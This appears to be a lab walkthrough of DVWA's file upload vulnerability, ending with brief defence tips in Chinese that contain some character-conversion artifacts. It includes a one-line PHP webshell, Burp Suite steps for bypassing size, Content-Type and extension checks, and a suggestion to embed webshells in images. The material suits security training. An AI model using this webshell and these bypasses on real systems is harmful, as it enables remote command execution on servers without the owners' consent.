File upload vulnerability

```php
<?php
// One-line webshell: runs whatever is passed in the cmd query parameter
// and prints the command output.
echo shell_exec($_GET['cmd']);
?>
```
- Upload the code above through the file upload form, then request the stored file in the browser.
- Even at the low security level DVWA limits uploads to 100 KB. The limit does not come from the PHP code (which performs no checks at all); it comes from the hidden MAX_FILE_SIZE field in the upload form, a value PHP honours but which the client sends.
- Turn on intercept in Burp.
- Upload a file that exceeds the limit again.
- In the intercepted request, raise the MAX_FILE_SIZE value and forward it; the upload now succeeds.
- That was the low security level. Switch to medium and look at the code.
File Upload Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // The stored name is the client-supplied name, so the extension on disk is attacker-controlled.
    $target_path = $target_path . basename($_FILES['uploaded']['name']);

    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];   // copied from the Content-Type header of the multipart part
    $uploaded_size = $_FILES['uploaded']['size'];

    // Only the declared MIME type and the size are checked; neither the name nor the content is.
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)) {
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    } else {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
```
The code above checks both the size and the type of the file.
- The approach is again to intercept the request in Burp and edit it: change the Content-Type of the 1.php part to image/jpeg. The value DVWA compares is $_FILES['uploaded']['type'], which is taken straight from that header, so the check passes while the file is still written to disk as 1.php. Not demonstrated in detail here.
- Now the high security level source.
File Upload Source
```php
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);

    $uploaded_name = $_FILES['uploaded']['name'];
    // Extension = everything after the last dot of the client-supplied name.
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];

    // Only the extension string and the size are checked; the declared type is
    // ignored now, but the file content is still never inspected.
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)) {
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    } else {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    }
}
?>
```
- Compared with medium, this level decides the type from the filename extension (the text after the last dot) rather than from the declared Content-Type, so editing the Content-Type in Burp alone no longer helps: the posted filename has to end in jpg or jpeg. The content is still never inspected, so a PHP payload uploaded as 1.jpg is accepted and stored; it just cannot be executed by requesting it directly, and needs something that includes it as PHP (DVWA's own file inclusion module is the usual route).
- In practice many applications now also inspect the file content. Embedding a one-line webshell inside an otherwise valid image (appended after the image data, or in a comment field) gets past such checks too; try it yourself.
如何進(jìn)行文件上傳漏洞防護(hù)?
- 首先肯定是要全面對(duì)上傳文件進(jìn)行過(guò)濾
- 其次對(duì)于上傳文件的目錄,要去除所有用戶可執(zhí)行權(quán)限